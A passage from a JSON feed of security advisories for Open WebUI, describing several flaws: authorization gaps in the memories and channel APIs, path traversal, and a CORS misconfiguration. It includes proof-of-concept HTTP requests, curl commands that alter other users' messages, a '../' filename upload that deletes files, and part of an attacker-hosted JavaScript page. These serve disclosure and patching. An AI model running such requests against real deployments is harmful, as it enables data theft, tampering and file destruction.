database.\n\n## Credits\n\n- **raresvis** — discovered the `data:text/html`-via-new-tab path\n- **Gh05t666nero** — discovered the `data:image/svg+xml`-via-server-side path (the more severe origin-XSS vector that determined the consolidated CVSS)\n\nPer our Report Handling policy, the cluster is consolidated into the earliest filing with credit to every reporter who demonstrated a distinct exploitation path.\n\n## Affected / patched versions\n\n- Affected: `\u003c 0.8.0`\n- Patched: `\u003e= 0.8.0`","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-14T20:15:19.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-6gh2-q7cp-9qf6","https://github.com/open-webui/open-webui/releases/tag/v0.8.0","https://nvd.nist.gov/vuln/detail/CVE-2026-45299","https://github.com/advisories/GHSA-6gh2-q7cp-9qf6"],"source_kind":"github","identifiers":["GHSA-6gh2-q7cp-9qf6","CVE-2026-45299"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.482Z","updated_at":"2026-09-03T03:03:10.754Z","epss_percentage":0.00199,"epss_percentile":0.09721,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02Z2gyLXE3Y3AtOXFmNs4ABW4l","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS02Z2gyLXE3Y3AtOXFmNs4ABW4l","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.8.0","vulnerable_version_range":"\u003c 0.8.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02Z2gyLXE3Y3AtOXFmNs4ABW4l/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1obWpxLWNyeHAtN3Jqd84ABWjx","url":"https://github.com/advisories/GHSA-hmjq-crxp-7rjw","title":"Open WebUI has inconsistent authorization controls within memories API","description":"### Summary\n\nAuthorization controls surrounding the memories API were inconsistent, resulting in the ability of a standard user to delete, restore, and view the contents of other users' memories.\n\n\n### Details\n\nUsing a newly created non-admin user with no existing memories, it is possible to view existing memories via `POST /api/v1/memories/query`. See below under the PoC section, where a call to `GET /api/v1/memories/` returns `[]` (as expected) but a call to `POST /api/v1/memories/query` reveals memories created by other users.\n\nSimilarly, even if a non-admin user cannot modify another user's memory data via `POST /api/v1/memories/{memory_id}/update`, the endpoint's response improperly leaks the content of that memory if a valid memory_id is known.\n\nThe `DELETE /api/v1/memories/{memory_id}` can also be used by any user to delete an existing memory. Deleted memories can then be restored by calling the `POST /api/v1/memories/{memory_id}/update` endpoint again.\n\n### PoC 1\n\n**Example of a user with no memories able to query an existing memory from another user**\n\n```\nGET /api/v1/memories/ HTTP/1.1\nHost: localhost:8080\nAuthorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjUxYmI2MTZkLWI4MDktNDkwZi1hNDFmLTg5MWIwYmY0OGUyOCJ9.4W1ju8dp2LdiBbgD3q0RZ6r2Xf26ti0c-PQn7tWYXEE\nUser-Agent: Test\nAccept: application/json\nContent-Type: application/json\nConnection: keep-alive\nContent-Length: 0\n\n---\n\nHTTP/1.1 200 OK\ndate: Fri, 18 Jul 2025 19:19:58 GMT\nserver: uvicorn\ncontent-length: 2\ncontent-type: application/json\nx-process-time: 0\n\n[]\n```\n\n```\nPOST /api/v1/memories/query HTTP/1.1\nHost: localhost:8080\nContent-Length: 19\nAuthorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjUxYmI2MTZkLWI4MDktNDkwZi1hNDFmLTg5MWIwYmY0OGUyOCJ9.4W1ju8dp2LdiBbgD3q0RZ6r2Xf26ti0c-PQn7tWYXEE\nUser-Agent: Test\naccept: application/json\nContent-Type: application/json\nConnection: keep-alive\n\n{\n  \"content\": \"\"\n}\n\n---\n\nHTTP/1.1 200 OK\ndate: Fri, 18 Jul 2025 19:22:01 GMT\nserver: uvicorn\ncontent-length: 187\ncontent-type: application/json\nx-process-time: 0\naccess-control-allow-origin: *\naccess-control-allow-credentials: true\n\n{\"ids\":[[\"d6802d76-a50f-4255-b68e-0f60c335e043\"]],\"documents\":[[\"My secret content\"]],\"metadatas\":[[{\"created_at\":1752784616,\"updated_at\":1752864797}]],\"distances\":[[0.6216812525921495]]}\n```\n\n### PoC 2\n\n**Example showing excess output about a memory a user has no access to modify**\n\n```\nPOST /api/v1/memories/d6802d76-a50f-4255-b68e-0f60c335e043/update HTTP/1.1\nHost: localhost:8080\nAuthorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjUxYmI2MTZkLWI4MDktNDkwZi1hNDFmLTg5MWIwYmY0OGUyOCJ9.4W1ju8dp2LdiBbgD3q0RZ6r2Xf26ti0c-PQn7tWYXEE\nUser-Agent: Test\nAccept: application/json\nContent-Type: application/json\nConnection: keep-alive\nContent-Length: 23\n\n{\n  \"content\": \"\"\n}\n\n---\n\nHTTP/1.1 200 OK\ndate: Fri, 18 Jul 2025 18:53:37 GMT\nserver: uvicorn\ncontent-length: 172\ncontent-type: application/json\nx-process-time: 0\n\n{\"id\":\"d6802d76-a50f-4255-b68e-0f60c335e043\",\"user_id\":\"a050e531-356b-4673-8772-ff1aecdf3273\",\"content\":\"My secret content\",\"updated_at\":1752864797,\"created_at\":1752784616}\n```\n\n### PoC 3\n\n**Example showing a memory being deleted then restored by a different user than its owner**\n\n```\nDELETE /api/v1/memories/d6802d76-a50f-4255-b68e-0f60c335e043 HTTP/1.1\nHost: localhost:8080\nAuthorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjUxYmI2MTZkLWI4MDktNDkwZi1hNDFmLTg5MWIwYmY0OGUyOCJ9.4W1ju8dp2LdiBbgD3q0RZ6r2Xf26ti0c-PQn7tWYXEE\nUser-Agent: Test\naccept: application/json\nConnection: keep-alive\n\n---\n\nHTTP/1.1 200 OK\ndate: Fri, 18 Jul 2025 19:31:19 GMT\nserver: uvicorn\ncontent-length: 4\ncontent-type: application/json\nx-process-time: 0\n\ntrue\n```\n\n```\nPOST /api/v1/memories/query HTTP/1.1\nHost: localhost:8080\nContent-Length: 19\nAuthorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjUxYmI2MTZkLWI4MDktNDkwZi1hNDFmLTg5MWIwYmY0OGUyOCJ9.4W1ju8dp2LdiBbgD3q0RZ6r2Xf26ti0c-PQn7tWYXEE\nUser-Agent: Test\naccept: application/json\nContent-Type: application/json\nConnection: keep-alive\n\n{\n  \"content\": \"\"\n}\n\n---\n\nHTTP/1.1 200 OK\ndate: Fri, 18 Jul 2025 19:32:31 GMT\nserver: uvicorn\ncontent-length: 63\ncontent-type: application/json\nx-process-time: 0\n\n{\"ids\":[[]],\"documents\":[[]],\"metadatas\":[[]],\"distances\":[[]]}\n```\n\n```\nPOST /api/v1/memories/d6802d76-a50f-4255-b68e-0f60c335e043/update HTTP/1.1\nHost: localhost:8080\nAuthorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjUxYmI2MTZkLWI4MDktNDkwZi1hNDFmLTg5MWIwYmY0OGUyOCJ9.4W1ju8dp2LdiBbgD3q0RZ6r2Xf26ti0c-PQn7tWYXEE\nUser-Agent: Test\nAccept: application/json\nContent-Type: application/json\nConnection: keep-alive\nContent-Length: 23\n\n{\n  \"content\": \"\"\n}\n\n---\n\nHTTP/1.1 200 OK\ndate: Fri, 18 Jul 2025 19:33:05 GMT\nserver: uvicorn\ncontent-length: 172\ncontent-type: application/json\nx-process-time: 0\n\n{\"id\":\"d6802d76-a50f-4255-b68e-0f60c335e043\",\"user_id\":\"a050e531-356b-4673-8772-ff1aecdf3273\",\"content\":\"My secret content\",\"updated_at\":1752864797,\"created_at\":1752784616}\n```\n\n```\nPOST /api/v1/memories/query HTTP/1.1\nHost: localhost:8080\nContent-Length: 19\nAuthorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjUxYmI2MTZkLWI4MDktNDkwZi1hNDFmLTg5MWIwYmY0OGUyOCJ9.4W1ju8dp2LdiBbgD3q0RZ6r2Xf26ti0c-PQn7tWYXEE\nUser-Agent: Test\naccept: application/json\nContent-Type: application/json\nConnection: keep-alive\n\n{\n  \"content\": \"\"\n}\n\n---\n\nHTTP/1.1 200 OK\ndate: Fri, 18 Jul 2025 19:33:34 GMT\nserver: uvicorn\ncontent-length: 187\ncontent-type: application/json\nx-process-time: 0\n\n{\"ids\":[[\"d6802d76-a50f-4255-b68e-0f60c335e043\"]],\"documents\":[[\"My secret content\"]],\"metadatas\":[[{\"created_at\":1752784616,\"updated_at\":1752864797}]],\"distances\":[[0.6216812525921495]]}\n```\n\n### Impact\n\nPotential disclosure of sensitive data stored within a user's memories. Disclosure of unique user ID values to non-admins when viewing a memory.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-11T14:25:49.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-hmjq-crxp-7rjw","https://nvd.nist.gov/vuln/detail/CVE-2026-44570","https://github.com/advisories/GHSA-hmjq-crxp-7rjw"],"source_kind":"github","identifiers":["GHSA-hmjq-crxp-7rjw","CVE-2026-44570"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-11T15:00:09.598Z","updated_at":"2026-09-03T03:03:17.291Z","epss_percentage":0.00294,"epss_percentile":0.21513,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1obWpxLWNyeHAtN3Jqd84ABWjx","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1obWpxLWNyeHAtN3Jqd84ABWjx","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.6.19","vulnerable_version_range":"\u003c 0.6.19"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1obWpxLWNyeHAtN3Jqd84ABWjx/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qZ2ozLXI4aHItOXBqd84ABWjv","url":"https://github.com/advisories/GHSA-jgj3-r8hr-9pjw","title":"Open WebUI's Improper Authorization in Standard Channels Allows Message Updates with Read Permission","description":"## Vulnerability Description\n\nIn standard channels (i.e., channels whose `channel.type` is neither `group` nor `dm`), the endpoint\n\n`POST /api/v1/channels/{channel_id}/messages/{message_id}/update` can be accessed with **read permission only**.\n\nWhen `access_control` is set to `None`, the authorization check `has_access(..., type=\"read\")` evaluates to `True`, allowing users who are **not the message owner** to update messages.\n\nAs a result, unauthorized modification of other users’ messages is possible.\n\n---\n\n## Attack Prerequisites\n\n- The attacker is an authenticated user (role `user` or higher)\n- The target channel is a standard channel (i.e., not `group` or `dm`)\n- `access_control` is `None` or allows `read` access\n- The attacker can obtain the target `message_id` (e.g., via the channel’s message list)\n\n\n\n## Attack Scenario\n\n1. The attacker (User B) retrieves another user’s `message_id` from the message list in a standard channel\n2. The attacker sends a request to\n    \n    `POST /api/v1/channels/{channel_id}/messages/{message_id}/update`\n    \n3. The message authored by another user (User A) is successfully updated\n\n\n\n## Potential Impact\n\n- Unauthorized modification of other users’ messages (violation of data integrity)\n\n\n# Steps to Reproduce\n\n1. Log in as an administrator\n\n\u003cimg width=\"3334\" height=\"1668\" alt=\"image\" src=\"https://github.com/user-attachments/assets/b20323d3-c050-4438-8912-193a417654bc\" /\u003e\n\n\n2. Create User A\n\n\u003cimg width=\"3346\" height=\"788\" alt=\"image\" src=\"https://github.com/user-attachments/assets/b9e4fb8a-b14e-4a4b-b012-02ccfba52fca\" /\u003e\n\n3. Create User B\n\n\u003cimg width=\"3354\" height=\"796\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f3cf6892-e6c9-4778-b471-f1cc0deec6c8\" /\u003e\n\n\n4. Log in as User A\n\n\u003cimg width=\"3360\" height=\"1668\" alt=\"image\" src=\"https://github.com/user-attachments/assets/5264ee07-f5c5-4bbe-ad4f-da69fb540fc9\" /\u003e\n\n\n5. Log in as User B\n\n\u003cimg width=\"3354\" height=\"1670\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f112f8e8-b3e2-4e65-b226-c7b6c986f3bb\" /\u003e\n\n\n6. As the administrator, create a new channel\n\n\u003cimg width=\"2582\" height=\"988\" alt=\"image\" src=\"https://github.com/user-attachments/assets/bc012d9a-f884-4c83-b6bb-d1e5399f61bb\" /\u003e\n\n\n7. As User A, post a new message in the channel\n\n\u003cimg width=\"2626\" height=\"962\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d7ff12c2-fe17-44f0-aaf9-5ce2bac9a378\" /\u003e\n\n\n8. As User B, edit User A’s message\n\n\u003cimg width=\"2604\" height=\"958\" alt=\"image\" src=\"https://github.com/user-attachments/assets/8e19ec3e-fdda-4d36-acd5-f3e1fd3402dd\" /\u003e\n\n\n9. Confirm that User A’s message has been modified without authorization\n\n\u003cimg width=\"2378\" height=\"1976\" alt=\"image\" src=\"https://github.com/user-attachments/assets/6415fd41-ac68-4d42-83c9-6297caee1fb4\" /\u003e\n\n\n## Affected Files and Line Numbers\n\n- `backend/open_webui/routers/channels.py:1417–1460`\n    \n    The authorization check in `update_message_by_id` allows access with **read** permission\n    \n- `backend/open_webui/utils/access_control.py:124–135`\n    \n    When `access_control=None` and `strict=True`, **read** access is permitted\n    \n- `backend/open_webui/models/messages.py:341–358`\n    \n    The update logic does not enforce any message ownership check\n    \n\n## Recommended Mitigation\n\nUpdate the condition in\n\n`backend/open_webui/routers/channels.py:1451–1456`\n\nby changing the permission check from **`read`** to **`write`**, so that only administrators, message owners, or users with write permission can update messages.\n\n### Proposed Changes\n\n- For standard channels, change the update permission requirement from\n    \n    `has_access(..., type=\"read\")` to `has_access(..., type=\"write\")`\n    \n- Preserve the existing ownership check (`message.user_id == user.id`)\n\n## **AI Usage**\n\n- Translation from Japanese to English\n- CWE classification and assessment\n- Affected Files and Line Numbers","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-11T14:05:24.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-jgj3-r8hr-9pjw","https://nvd.nist.gov/vuln/detail/CVE-2026-44571","https://github.com/advisories/GHSA-jgj3-r8hr-9pjw"],"source_kind":"github","identifiers":["GHSA-jgj3-r8hr-9pjw","CVE-2026-44571"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-11T15:00:09.598Z","updated_at":"2026-09-03T03:03:17.293Z","epss_percentage":0.00277,"epss_percentile":0.19518,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qZ2ozLXI4aHItOXBqd84ABWjv","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qZ2ozLXI4aHItOXBqd84ABWjv","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.8.6","vulnerable_version_range":"\u003c= 0.8.5"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qZ2ozLXI4aHItOXBqd84ABWjv/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qeHdyLWc2cjYtajNmeM4ABWju","url":"https://github.com/advisories/GHSA-jxwr-g6r6-j3fx","title":"Open WebUI's Insecure Message Access Breaks Authorization","description":"### Description\n\nThere's an IDOR in the channels message management system that allows authenticated users to modify or delete any message within channels they have read access to. The vulnerability exists in the message update and delete endpoints, which implement channel-level authorization but completely lack message ownership validation.\n\nWhile the frontend correctly implements ownership checks (showing edit/delete buttons only for message owners or admins), the backend APIs bypass these protections by only validating channel access permissions without verifying that the requesting user owns the target message. This creates a client-side security control bypass where attackers can directly call the APIs to modify other users' messages.\n\nThe vulnerability affects both message content modification and deletion, allowing users to tamper with message integrity and audit trails in collaborative channel environments.\n\n### Source - Sink Analysis\n\n**Source:** User-controlled `message_id` parameter in URL path\n\n**Call Chain:**\n1. FastAPI route handlers `update_message_by_id()` (line 450) and `delete_message_by_id()` (line 630) in `backend/open_webui/routers/channels.py`\n2. Channel-level authorization check: `has_access(user.id, type=\"read\", access_control=channel.access_control)` at lines 457 and 637\n3. Message retrieval: `Messages.get_message_by_id(message_id)` at lines 467 and 647  \n4. Channel ID validation: `if message.channel_id != id:` at lines 472 and 652\n5. **Missing:** Message ownership validation (`message.user_id == user.id`)\n6. **Sink:** `Messages.update_message_by_id(message_id, form_data)` at line 476 or `Messages.delete_message_by_id(message_id)` at line 658 - modifies any message without ownership verification\n\n### Proof of Concept\n\n1. Deploy Open WebUI with channels enabled (`ENABLE_CHANNELS=true`)\n2. Create scenario:\n   - User A creates a channel and grants User B read access\n   - User A posts a message in the channel\n   - User B observes the message_id from the frontend\n3. Exploit: User B sends direct API requests bypassing frontend controls:\n\nMessage Update:\n```bash\ncurl -X POST \"http://localhost:8080/api/v1/channels/{channel_id}/messages/{victim_message_id}/update\" \\\n     -H \"Authorization: Bearer {attacker_token}\" \\\n     -H \"Content-Type: application/json\" \\\n     -d '{\"content\": \"Malicious content injected by attacker\"}'\n```\n\nMessage Deletion:\n```bash\ncurl -X DELETE \"http://localhost:8080/api/v1/channels/{channel_id}/messages/{victim_message_id}/delete\" \\\n     -H \"Authorization: Bearer {attacker_token}\"\n```\n\n4. Result: Victim's message is modified or deleted despite User B only having read permissions\n\n### Impact\n\n- Users can modify other users' message content within shared channels\n- Read-only users gain write/delete capabilities over other users' content\n\n### Remediation\n\nImplement proper message ownership validation in the update and delete endpoints by adding ownership checks that follow the established security pattern used throughout the codebase. First, add a validation condition after the existing message retrieval to ensure only message owners or admins can modify messages: `if user.role != \"admin\" and message.user_id != user.id and not has_access(user.id, type=\"write\", access_control=channel.access_control)` then raise a 403 Forbidden exception. Second, change the existing permission check from `type=\"read\"` to `type=\"write\"` for both update and delete operations to align with the access control model used in other routers (notes, prompts, knowledge, etc.).","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-11T14:04:35.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-jxwr-g6r6-j3fx","https://nvd.nist.gov/vuln/detail/CVE-2026-44569","https://github.com/advisories/GHSA-jxwr-g6r6-j3fx"],"source_kind":"github","identifiers":["GHSA-jxwr-g6r6-j3fx","CVE-2026-44569"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-11T15:00:09.598Z","updated_at":"2026-09-03T03:03:17.294Z","epss_percentage":0.00266,"epss_percentile":0.1806,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qeHdyLWc2cjYtajNmeM4ABWju","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qeHdyLWc2cjYtajNmeM4ABWju","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.6.19","vulnerable_version_range":"\u003c= 0.6.18"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qeHdyLWc2cjYtajNmeM4ABWju/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qM2Z3LXdjNDgtMjlnM84ABWjt","url":"https://github.com/advisories/GHSA-j3fw-wc48-29g3","title":"Open WebUI Arbitrary File Write, Delete via Path Traversal","description":"** CONFIDENTIAL **\n\nVulnerability Disclosure Analysis Documentation\n-----------------------------------------------\n\nVulnerability Details\n---------------------\n1. Discoverer: Taylor Pennington of KoreLogic, Inc.\n2. Date Submitted: June 11, 2024\n3. Title: Open WebUI Arbitrary File Write, Delete via Path Traversal\n4. High-level Summary:\n     Attacker controlled files can be uploaded to arbitrary locations on the web\n     server's filesystem by abusing a path traversal vulnerability. After the\n     file is written, it is deleted.\n5. Affected Vendor: Open WebUI\n6. Affected Product(s): Open WebUI (Formerly Ollama WebUI)\n7. Affected Version(s): 0.1.105\n8. Platform/OS: Debian GNU/Linux 12 (bookworm)\n9. Vector: HTTP web interface\n10. CWE: 22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')\n11. Technical Analysis:\n   \n   When attaching files to a prompt by clicking the plus sign (+) on the left of\n   the message input box when using the Open WebUI HTTP interface, the file is\n   uploaded to a static upload directory. If the file is an audio file\n   it will be sent to a second API that will attempt to transcribe it.\n\n   The name of the file is derived from the original HTTP upload request and is\n   not validated or sanitized. This allows for users to upload files with names\n   containing dot-segments in the file path and traverse out of the intended\n   uploads directory. Effectively, users can upload files anywhere on the\n   filesystem the user running the web server has permission.\n\n   This can be visualized by examining the python code for the\n   \"/ollama/models/upload\" API route (https://github.com/open-webui/open-webui/blob/0399a69b73de9789c4221acedea70d528e1346c4/backend/apps/ollama/main.py#L1063-L1127):\n\n   ```\n   def upload_model(file: UploadFile = File(...), url_idx: Optional[int] = None):\n    if url_idx == None:\n        url_idx = 0\n    ollama_url = app.state.OLLAMA_BASE_URLS[url_idx]\n\n    file_path = f\"{UPLOAD_DIR}/{file.filename}\"\n\n    # Save file in chunks\n    with open(file_path, \"wb+\") as f:\n        for chunk in file.file:\n            f.write(chunk)\n\n    def file_process_stream():\n        nonlocal ollama_url\n        total_size = os.path.getsize(file_path)\n        chunk_size = 1024 * 1024\n        try:\n            with open(file_path, \"rb\") as f:\n                total = 0\n                done = False\n\n                while not done:\n                    chunk = f.read(chunk_size)\n                    if not chunk:\n                        done = True\n                        continue\n\n                    total += len(chunk)\n                    progress = round((total / total_size) * 100, 2)\n\n                    res = {\n                        \"progress\": progress,\n                        \"total\": total_size,\n                        \"completed\": total,\n                    }\n                    yield f\"data: {json.dumps(res)}\\n\\n\"\n\n                if done:\n                    f.seek(0)\n                    hashed = calculate_sha256(f)\n                    f.seek(0)\n\n                    url = f\"{ollama_url}/api/blobs/sha256:{hashed}\"\n                    response = requests.post(url, data=f)\n\n                    if response.ok:\n                        res = {\n                            \"done\": done,\n                            \"blob\": f\"sha256:{hashed}\",\n                            \"name\": file.filename,\n                        }\n                        os.remove(file_path)\n                        yield f\"data: {json.dumps(res)}\\n\\n\"\n                    else:\n                        raise Exception(\n                            \"Ollama: Could not create blob, Please try again.\"\n                        )\n\n        except Exception as e:\n            res = {\"error\": str(e)}\n            yield f\"data: {json.dumps(res)}\\n\\n\"\n\n    return StreamingResponse(file_process_stream(), media_type=\"text/event-stream\")\n    ```\n\n    The model is temporarily written to disk in chunks and then the data is sent to\n    another internal API. Once the file is successfully passed, the file is removed\n    from the disk. Note line 1116, `os.remove(file_path)`.\n\n    This has an affect of stomping on and ultimately deleting any file that the user\n    of the open-webui service has permissions over.\n\n    It may be possible to continue sending chunks to the file slowly and create\n    a race condition however, this was not validated.\n\n12. Proof-of-Concept:\n\n    First, create a file under the `/tmp` directory named `DELETE_ME` while\n    logged in as the user account of the web application or chown the file to be\n    owned by the open-webui user.\n\n    ```\n    # su ollama\n    # touch /tmp/DELETE_ME\n    ```\n   \n   Execute the following cURL command after replacing the exported `JWT` value for a valid user session:\n\n    ```\n    export JWT=\"JWT_HERE\"; curl -s -X $'POST' \\\n    -H $'Host: openwebui.example.com' -H $'Content-Length: 206' -H \"Authorization: Bearer ${JWT}\" -H $'Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW' \\\n    --data-binary $'------WebKitFormBoundary7MA4YWxkTrZu0gW\\x0d\\x0aContent-Disposition: form-data; name=\\\"file\\\"; filename=\\\"../../../../../../../tmp/DELETE_ME\\\"\\x0d\\x0aContent-Type: image/png\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a------WebKitFormBoundary7MA4YWxkTrZu0gW--' \\\n    $'https://openwebui.example.com/ollama/models/upload'\n    ```\n\n    Verify that `/tmp/DELETE_ME` has been deleted.\n\n13. Mitigation Recommendation: Modify line 1070 (https://github.com/open-webui/open-webui/blob/0399a69b73de9789c4221acedea70d528e1346c4/backend/apps/ollama/main.py#L1070) to: \n\n```\nfilename = os.path.basename(file.filename)\nfile_path = f\"{UPLOAD_DIR}/{filename}\"\n```","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-11T14:03:24.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-j3fw-wc48-29g3","https://nvd.nist.gov/vuln/detail/CVE-2026-44565","https://github.com/advisories/GHSA-j3fw-wc48-29g3"],"source_kind":"github","identifiers":["GHSA-j3fw-wc48-29g3","CVE-2026-44565"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-11T15:00:09.598Z","updated_at":"2026-09-03T03:03:17.294Z","epss_percentage":0.00454,"epss_percentile":0.37525,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qM2Z3LXdjNDgtMjlnM84ABWjt","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qM2Z3LXdjNDgtMjlnM84ABWjt","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.6.10","vulnerable_version_range":"\u003c= 0.6.9"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qM2Z3LXdjNDgtMjlnM84ABWjt/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS02eGNwLTdtcHItbTd3bc4ABWjs","url":"https://github.com/advisories/GHSA-6xcp-7mpr-m7wm","title":"Open WebUI has a CORS misconfiguration and session validation issue","description":"# GitHub Security Lab (GHSL) Vulnerability Report, open-webui: `GHSL-2024-174`, `GHSL-2024-175`\n\nThe [GitHub Security Lab](https://securitylab.github.com) team has identified potential security vulnerabilities in [open-webui](https://github.com/open-webui/open-webui).\n\nWe are committed to working with you to help resolve these issues. In this report you will find everything you need to effectively coordinate a resolution of these issues with the GHSL team.\n\nIf at any point you have concerns or questions about this process, please do not hesitate to reach out to us at `securitylab@github.com` (please include `GHSL-2024-174` or `GHSL-2024-175` as a reference). See also [this blog post](https://github.blog/2022-04-22-removing-the-stigma-of-a-cve/) written by GitHub's Advisory Curation team which explains what CVEs and advisories are, why they are important to track vulnerabilities and keep downstream users informed, the CVE assigning process, and how they are used to keep open source software secure.\n\nIf you are _NOT_ the correct point of contact for this report, please let us know!\n\n## Summary\n\nDue to a CORS misconfiguration and session validation issue, an attacker may be able to perform a 1 click attack against browsers with admin access to openwebui, resulting in remote code execution in the openwebui instance. The openwebui application runs as root in Docker container's default setup, which allows for complete compromise of the container.\n\n## Project\n\nopen-webui\n\n## Tested Version\n\n[v0.3.10](https://github.com/open-webui/open-webui/releases/tag/v0.3.10)\n\n## Details\n\n### Issue 1: CORS misconfiguration on multiple routers (`GHSL-2024-174`)\n\nCORS misconfigurations exist on multiple routers of open-webui which results in allowing arbitrary websites to make authenticated cross site requests to openwebui. Accounts with access to the `/api/v1/functions` endpoint (admins) can execute arbitrary code on the openwebui instance. \n\nThe following pattern occurs at the following routers:\n1. [backend/apps/webui/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/webui/main.py#L92)\n2. [backend/apps/audio/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/audio/main.py#L58)\n3. [backend/apps/images/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/images/main.py#L60)\n4. [backend/apps/rag/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/rag/main.py#L246)\n5. [backend/apps/openai/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/openai/main.py#L47)\n6. [backend/apps/ollama/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/ollama/main.py#L62)\n7. [backend/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/main.py#L881)\n```python\napp.add_middleware(\n    CORSMiddleware,\n    allow_origins=[\"*\"],\n    allow_credentials=True,\n    allow_methods=[\"*\"],\n    allow_headers=[\"*\"],\n)\n```\n\n#### Impact\n\nThis issue may lead to `Remote Code Execution`.\n\n#### Remediation\n\nThe FastAPI CORS middleware is not safe by default, meaning it reflects the origin when specifying `allow_origins=[\"*\"]`.  Remove the vulnerable, broad origin and allow users to dynamically setup the exact allowed origins via the administration panel or config file, do not allow for broad origins such as `\"*\"` or `\"*.com\"`\n\n#### Proof of Concept\n\nHost the following code on your website, `attacker.com`. Open the webpage using Firefox, and click on the webpage as instructed. Check your openwebui host to see the result of the command `whoami` placed into a newly created file `/tmp/whoami.txt`. Ensure you have logged into an admin open-webui account \n```javascript\n\u003cbody\u003e\n    \u003cp\u003eClick here to login.\u003c/p\u003e\n    \u003cdiv id=\"response\"\u003e\u003c/div\u003e\n \n    \u003cscript\u003e\n      //Firefox cross site cookie request bypass\n      const url = 'http://localhost:3000/static/favicon.png';\n      